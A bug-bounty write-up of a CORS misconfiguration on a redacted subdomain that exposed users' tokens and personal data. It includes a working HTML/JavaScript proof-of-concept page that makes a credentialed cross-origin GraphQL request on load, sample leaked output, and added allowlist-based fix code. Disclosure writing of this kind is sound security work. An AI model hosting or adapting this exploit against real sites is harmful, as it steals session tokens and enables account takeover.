CORS Misconfiguration: Stealing the victim's token and PII leads to ATO

Hello Friends.

Today I will talk about a bug I found in July 2020 on a private program on HackerOne. The bug is called "Cross-Origin Resource Sharing (CORS) Misconfiguration".

1-Firstly, what is CORS?

Cross-Origin Resource Sharing (CORS) is a mechanism that lets web browsers perform cross-domain requests (for example with the XMLHttpRequest API) in a controlled manner. Such cross-origin requests carry an Origin header that identifies the domain initiating the request. CORS defines the protocol between the browser and the server for deciding whether a cross-origin request is allowed and whether its response may be read by the requesting page.

2-Summary

After reviewing the program scope, I concluded that all subdomains are out of scope; only the main domain is in scope.

3-Steps To Reproduce

Day one: I started hunting on the main domain www.redact.com. I learned how the program's services work and also tested for bugs, but the site is quite secure.

Day two: I went back to my testing. When I viewed the source code I noticed a subdomain in the code named core-plugins.redact.com.
I knew it was out of scope, but my mind told me to test it.
The subdomain core-plugins.redact.com does not have a registration page; I can just log in with my account from the main domain (SSO).

After logging in I found this request:

It printed PII in the response: token, email, user info, etc.
Then I noticed "Access-Control-Allow-Credentials: true", so I changed the Origin header: I deleted core-plugins.redact.com and added https://evil.com, and it worked!

Then I edited the GraphQL request to steal more info.

4-Exploitation Code

<!DOCTYPE html>
<html>
<head>
<script>
function cors_exploit() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      // Show the cross-origin response: pop it up and print it into the page
      alert(this.responseText);
      document.getElementById("cors").innerText = this.responseText;
    }
  };

  xhttp.open("GET", "https://core-plugins.redact.com/graphql?app=web&query=query%20App%20{customer%20{id,...F2}}%20fragment%20F0%20on%20Customer%20{is_premier,is_premier_parent,premier_permissions,username,user_type,full_name,organization_id,customer_id,hostname,token,id}%20fragment%20F1%20on%20Customer%20{premier_permissions,is_premier_parent,id}%20fragment%20F2%20on%20Customer%20{username,full_name,email,is_admin,id,...F0,...F1}", true);
  // Send the victim's session cookies along with the cross-origin request
  xhttp.withCredentials = true;
  xhttp.send();
}
</script>
</head>
<body onload="cors_exploit()">
<center>
<h2>Exploiting CORS Vulnerability</h2>
<h3>Extract SID</h3>
<div id="cors"></div>
<button type="button" onclick="cors_exploit()">Exploit</button>
</center>
</body>
</html>

Then I uploaded it to my website www.mysite.com/cors.html and it worked; the data was printed:

{
  "data": {
    "customer": {
      "id": "u285728853",
      "username": "storedthings133776",
      "full_name": null,
      "email": "storedthings1337@gmail.com",
      "is_admin": false,
      "is_premier": false,
      "is_premier_parent": false,
      "premier_permissions": [],
      "user_type": "core user",
      "organization_id": null,
      "customer_id": "285728853",
      "hostname": "core-plugins.redact.com",
      "token": "1/eyJjbGllbnRfaWQiOiI3YTE*****************"
    }
  },
  "extensions": {}
}

5-The Token

With this token an attacker could access the victim's account, perform any action on the victim's behalf, and call other endpoints of the API.
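Added example (not code from the original post): a server-side CORS decision function in JavaScript that shows the pattern behind this bug, reflecting whatever Origin the browser sent together with Access-Control-Allow-Credentials: true, next to an exact-match allowlist fix. The allowlisted hostnames and the browserCanRead helper are assumptions for illustration.

```javascript
// Constructed allowlist for the core-plugins.redact.com API (assumed values).
const ALLOWED_ORIGINS = new Set([
  "https://www.redact.com",
  "https://core-plugins.redact.com",
]);

// Vulnerable pattern: the Origin header is echoed back unchanged and
// credentials are allowed, so any site the victim visits can read the
// authenticated GraphQL response (the bug described in the write-up).
function vulnerableCorsHeaders(origin) {
  if (!origin) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Hardened pattern: exact-match allowlist (no suffix or regex matching, so
// "https://evil-redact.com" and the literal "null" origin never match),
// credentials only for an allowed origin, and Vary: Origin so shared caches
// do not serve one origin's CORS headers to another.
function hardenedCorsHeaders(origin) {
  if (!origin || !ALLOWED_ORIGINS.has(origin)) {
    return { Vary: "Origin" };
  }
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    Vary: "Origin",
  };
}

// Models the browser's rule for a credentialed (withCredentials = true)
// request: the response is readable only when ACAO equals the requesting
// origin exactly (a wildcard "*" is rejected) and ACAC is "true".
function browserCanRead(origin, headers) {
  return (
    headers["Access-Control-Allow-Origin"] === origin &&
    headers["Access-Control-Allow-Credentials"] === "true"
  );
}
```

Running browserCanRead with an attacker origin against both header builders reproduces the finding: the reflecting version lets https://evil.com read the response, the allowlist version does not.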

Timeline

Nov 19th : Report Sent

Nov 20th: Triaged

Nov 20th: Rewarded

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

That's all, thank you very much for reading to the end. I hope you enjoyed it.

Thanks to @elmrhaseel @ayoubakup @Moroccan-Bugbounty-Hunters
